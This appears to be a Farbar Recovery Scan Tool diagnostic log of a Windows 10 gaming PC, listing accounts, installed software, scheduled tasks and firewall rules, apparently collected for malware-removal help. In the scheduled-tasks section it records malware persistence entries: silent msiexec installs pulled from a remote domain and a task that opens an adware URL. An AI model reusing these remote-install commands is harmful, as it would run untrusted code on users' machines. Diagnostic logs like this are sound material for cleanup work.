Additional scan result of Farbar Recovery Scan Tool (x64) Version: 08.11.2018
Ran by MeGret-TPC (10-11-2018 16:22:34)
Running from C:\Users\MeGret-TPC\Desktop
Windows 10 Pro Version 1803 17134.165 (X64) (2018-06-10 20:30:46)
Boot Mode: Safe Mode (minimal)
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-819675408-2753461327-3771956256-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-819675408-2753461327-3771956256-503 - Limited - Disabled)
Guest (S-1-5-21-819675408-2753461327-3771956256-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-819675408-2753461327-3771956256-1005 - Limited - Enabled)
MeGret-TPC (S-1-5-21-819675408-2753461327-3771956256-1001 - Administrator - Enabled) => C:\Users\MeGret-TPC
WDAGUtilityAccount (S-1-5-21-819675408-2753461327-3771956256-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 31 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 31.0.0.122 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.23) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.23 - Adobe Systems Incorporated)
Aktualizace NVIDIA 2.11.4.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.11.4.1 - NVIDIA Corporation) Hidden
Aktualizace produktu Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0405-0000-0000000FF1CE}_ENTERPRISE_{0A1FAC46-B899-421D-B1A2-470896DC45DB}) (Version: - Microsoft)
Aktualizace produktu Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0405-0000-0000000FF1CE}_ENTERPRISE_{5260BB53-C1F7-4A3B-9AEB-3EC9B37FF194}) (Version: - Microsoft)
Aktualizace produktu Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0405-0000-0000000FF1CE}_ENTERPRISE_{E68DD413-B834-4923-8181-0A03B7555187}) (Version: - Microsoft)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 18.10.2 - Advanced Micro Devices, Inc.)
Armored Warfare MyCom (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\Armored Warfare MyCom) (Version: 1.185 - My.com B.V.)
Ashampoo Burning Studio 6 FREE v.6.84 (HKLM-x32\...\{91B33C97-3ED1-03EA-A67B-244AA4D7B559}_is1) (Version: 6.8.4 - Ashampoo GmbH & Co. KG)
Aslain's WoT Modpack verze 1.2.0.1.10 (HKLM-x32\...\Aslains_WoT_Modpack_Installer_is1) (Version: 1.2.0.1.10 - Aslain)
Asmedia ASM106x SATA Host Controller Driver (HKLM-x32\...\{DF6C3726-7E53-4772-9763-E9F147769F51}) (Version: 3.1.8.0000 - Asmedia Technology)
ASUS GPU TweakII (HKLM-x32\...\{0075AAC2-EA9F-490E-83F7-5D5F81EB2A43}) (Version: 1.1.7.2 - ASUSTek COMPUTER INC.) Hidden
ASUS GPU TweakII (HKLM-x32\...\InstallShield_{0075AAC2-EA9F-490E-83F7-5D5F81EB2A43}) (Version: 1.1.7.2 - ASUSTek COMPUTER INC.)
ASUS Product Register Program (HKLM-x32\...\{49BE9B8A-E858-4533-A74A-64306C13DB59}) (Version: 1.0.014 - ASUS)
ASUS Product Register Program (HKLM-x32\...\{C87D79F6-F813-4812-B7A9-CCCAAB8B1188}) (Version: 1.0.031 - ASUSTek Computer Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Bigasoft Total Video Converter 5.1.1.6250 (HKLM-x32\...\{A72CE741-1F32-4D79-BFFB-A714375C6750}_is1) (Version: - Bigasoft Corporation)
Branding64 (HKLM\...\{EE2AFCE4-0238-4DE0-A140-1647021627C1}) (Version: 1.00.0001 - Advanced Micro Devices, Inc.) Hidden
calibre 64bit (HKLM\...\{B16F2206-747F-4758-ADA9-76148D2C0C35}) (Version: 3.7.0 - Kovid Goyal)
Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Creative ALchemy (HKLM-x32\...\ALchemy) (Version: 1.45 - Creative Technology Limited)
Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited)
Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.41 - Creative Technology Limited)
Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.03 - Creative Technology Limited)
CrystalDiskInfo 7.8.0 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 7.8.0 - Crystal Dew World)
GameCenter My.com (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\GameCenter) (Version: 4.1464 - My.com B.V.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 70.0.3538.77 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
ICQ (verze 10.0.12393) (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\icq.desktop) (Version: 10.0.12393 - ICQ)
Java 8 Update 181 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
MediaHuman YouTube to MP3 Converter 3.9.9.7 (HKLM-x32\...\MediaHuman YouTube to MP3 Converter_is1) (Version: 3.9.9.7 - MediaHuman)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\OneDriveSetup.exe) (Version: 18.172.0826.0010 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.14.26429 (HKLM-x32\...\{80586c77-db42-44bb-bfc8-7aebbb220c00}) (Version: 14.14.26429.4 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 63.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 63.0.1 (x64 cs)) (Version: 63.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 63.0.1 - Mozilla)
NAS Starter Utility (HKLM-x32\...\NAS Starter Utility) (Version: - ZyXEL)
NVIDIA Ovladač 3D Vision 388.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 388.13 - NVIDIA Corporation)
NVIDIA Ovladač řídící jednotky 3D Vision 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 388.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 388.13 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Ovládací panel NVIDIA 388.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 388.13 - NVIDIA Corporation) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.18.526.2017 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8233 - Realtek Semiconductor Corp.)
Samsung Printer Center (HKLM-x32\...\Samsung Printer Center) (Version: 1.0.0.26 - Samsung Electronics Co., Ltd.)
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 2.11.4.1 - NVIDIA Corporation) Hidden
Slovenčina (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\Slovenčina) (Version: - )
SpyHunter 5 (HKLM-x32\...\SpyHunter5) (Version: 5.0.30.51 - EnigmaSoft Limited)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Stellar Data Recovery Professional (HKLM-x32\...\Stellar Data Recovery Professional_is1) (Version: 8.0.0.0 - Stellar Information Technology Pvt Ltd.)
TeamSpeak 3 Client (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\TeamSpeak 3 Client) (Version: 3.1.7 - TeamSpeak Systems GmbH)
Uninstall Samsung Printer Software (HKLM-x32\...\TotalUninstaller) (Version: 4.0.0.67 - Samsung Electronics CO., LTD.)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.5.1 - VideoLAN)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Windows Resource Kit Tools - SubInAcl.exe (HKLM-x32\...\{D3EE034D-5B92-4A55-AA02-2E6D0A6A96EE}) (Version: 5.2.3790.1164 - Microsoft Corporation)
WinRAR 5.60 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.60.0 - win.rar GmbH)
WiperSoft 1.1.1143.64 (HKLM\...\{AB1C8C91-4D8E-4C28-80E7-FD135FB90515}}_is1) (Version: 1.1.1143.64 - WiperSoft)
World of Tanks (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
XSplit Gamecaster (HKLM-x32\...\{8915913F-E4AF-46C5-B4EF-3535D83BFFDE}) (Version: 2.5.1507.3018 - SplitmediaLabs)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2018-10-19] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-10-27] (NVIDIA Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-06-24] (Alexander Roshal)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {07280288-DB4D-4C69-A6A0-EC1F1E0FC6CB} - System32\Tasks\CrystalDiskInfo => C:\Program Files (x86)\CrystalDiskInfo\DiskInfo32.exe [2018-09-26] (Crystal Dew World)
Task: {0D7125B3-7656-4619-A37A-395D9A914DC0} - System32\Tasks\{36E954AC-8F78-691F-B718-D4CE7E4BCF08} => "msiexec.exe" /i hxxps://siamoderg.info/biksomt5m1kp.sem /q
Task: {132D8886-4A07-462A-B824-78AF1B6BF888} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {1EA8098C-25F5-46DE-A412-1C6E1B81EDFC} - System32\Tasks\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA} => "msiexec.exe" -q /package hxxps://siamoderg.info/axqchyoohzpx.tci
Task: {29B99B7C-90C3-4774-9EEF-C7C2C6F89FAE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-10-23] (Microsoft Corporation)
Task: {2D84FD82-F950-4803-B0BE-C1EB93F22EA3} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe [2018-10-19] (Advanced Micro Devices, Inc.)
Task: {4346CC41-CDA3-4C56-A023-850111055F0E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-10-23] (Microsoft Corporation)
Task: {5A5135D8-94BD-4131-9D72-8756CCD8FEA5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {6783EA1B-F8CB-4EBD-878B-51DDF41C013A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {877C1772-9F30-4BE9-8463-5DF5AA19A3D4} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {92146086-56B7-4E0D-9EA3-C78832C285BA} - System32\Tasks\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://good-journal.net/cl/?guid=nyor7zhu2zo5lt5unen1imu9nond6q8k&prid=1&pid=4_1324_0
Task: {96688FB2-4CE3-4F3D-A584-F314406F8346} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2018-10-19] (Advanced Micro Devices, Inc.)
Task: {976419D4-FD01-4AB6-80D7-3761E92102BE} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-10-14] (Adobe Systems Incorporated)
Task: {99678DB9-056F-4AD4-A601-75B89C7CDA66} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-10-23] (Microsoft Corporation)
Task: {C3DC2968-1E50-4BFB-93A2-45DC49F2C8A3} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_122_Plugin.exe [2018-10-14] (Adobe Systems Incorporated)
Task: {C5DB1688-8B19-4F27-AF9F-967D1A326EBB} - System32\Tasks\ASUS\ASUS Product Register Service => C:\Program Files (x86)\ASUS\APRP\aprp.exe [2015-05-18] ()
Task: {E61B0F9B-0AD8-473F-A64D-A77DF90CB170} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-10-23] (Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Your Software Deals.lnk -> C:\ProgramData\Ashampoo\YourDeals.exe () -> hxxp://linktarget.ashampoo.com/linktarget/?target=marketplace&edition=eid=13472&utm_medium=desktop&x-pos=Metro
==================== Loaded Modules (Whitelisted) ==============
2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-07-18 23:43 - 2018-07-06 07:55 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-10-23 23:42 - 2018-10-23 23:43 - 000183808 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.33.41.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-10 12:04 - 2015-07-10 12:02 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\windows\img0.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
==================== MSCONFIG/TASK MANAGER disabled items ==
If an entry is included in the fixlist, it will be removed.
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{E0F5C4B0-52F3-4BE7-A5E1-D7D90246D087}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Printer Center\SamsungPrinterCenter.exe
FirewallRules: [UDP Query User{16F97FBE-AB3C-41AD-A0D4-95769E557C27}C:\program files (x86)\blizzard app\battle.net.8839\battle.net.exe] => (Allow) C:\program files (x86)\blizzard app\battle.net.8839\battle.net.exe
FirewallRules: [TCP Query User{3980848F-3765-4CA2-806E-C5E62A63ECF7}C:\program files (x86)\blizzard app\battle.net.8839\battle.net.exe] => (Allow) C:\program files (x86)\blizzard app\battle.net.8839\battle.net.exe
FirewallRules: [UDP Query User{A18C9094-4D41-405B-99E5-151E42BEB7E4}C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe] => (Allow) C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe
FirewallRules: [TCP Query User{6611FD6F-E02D-4655-A19D-4456D09F6587}C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe] => (Allow) C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe
FirewallRules: [{D80CDD55-C34A-4BAE-9D8D-4B5091BBDDE3}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{8A6534E2-584B-411D-B95C-A14226F23EBA}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [UDP Query User{831EAC7B-6A9E-481B-8E11-A2C4E0BA775F}C:\world_of_warships\wowslauncher.exe] => (Allow) C:\world_of_warships\wowslauncher.exe
FirewallRules: [TCP Query User{5B267066-14D4-438C-B04E-48DAF9BAE98C}C:\world_of_warships\wowslauncher.exe] => (Allow) C:\world_of_warships\wowslauncher.exe
FirewallRules: [{5E486191-31A4-4B6F-AE27-A44E21FE0A7E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{B9D1CEED-53B1-4F6B-89CE-307147795EE9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{7FD09255-5E88-4394-8BAA-EA49321E3191}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{21C71B61-81AC-4513-82CB-0AB2F6D29920}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{0C506A94-F9FC-4405-A4B1-5A8E88E97C7F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{E151925F-5554-4AAB-B888-8BDD2556BFA0}C:\world_of_tanks\worldoftanks.exe] => (Allow) C:\world_of_tanks\worldoftanks.exe
FirewallRules: [UDP Query User{F727C40D-6F40-43FB-A06F-CCC0803E1AD3}C:\world_of_tanks\worldoftanks.exe] => (Allow) C:\world_of_tanks\worldoftanks.exe
FirewallRules: [TCP Query User{CD837059-4171-4FBF-80FC-3FE3A0554DE9}C:\world_of_tanks\wotlauncher.exe] => (Allow) C:\world_of_tanks\wotlauncher.exe
FirewallRules: [UDP Query User{E73DBA2D-D0D7-48D4-9CAB-D7563AB6B47D}C:\world_of_tanks\wotlauncher.exe] => (Allow) C:\world_of_tanks\wotlauncher.exe
FirewallRules: [TCP Query User{C39A4149-F0A9-4F15-A511-678059468061}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{8ACA6309-88A5-4516-AD42-0B0386C55E33}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{E4A4197D-AEF7-400E-862F-58B5D5A996CC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{701C4593-ADD4-4AFD-9A47-5F23639592CF}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{BCD18F07-2496-40FB-B3C1-BA0344289276}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{659EA0A5-52BF-4B6A-AF1D-D684D5727C4A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{29317E3A-4F89-446C-A027-4FC9625BD4FF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SpaceEngineers\Bin64\SpaceEngineers.exe
FirewallRules: [{68DFF9FF-8C4F-4A82-B7AF-EE46C7BCBF8C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SpaceEngineers\Bin64\SpaceEngineers.exe
FirewallRules: [{A7DCB652-04FB-4947-A1F5-21961F5AFA5A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{303AA42E-DF64-4683-A1A2-C029C7A8B360}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [TCP Query User{736B4A66-A6A0-4A88-9354-8D9AAF64B2C3}C:\users\megret-tpc\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\megret-tpc\appdata\local\gamecenter\gamecenter.exe
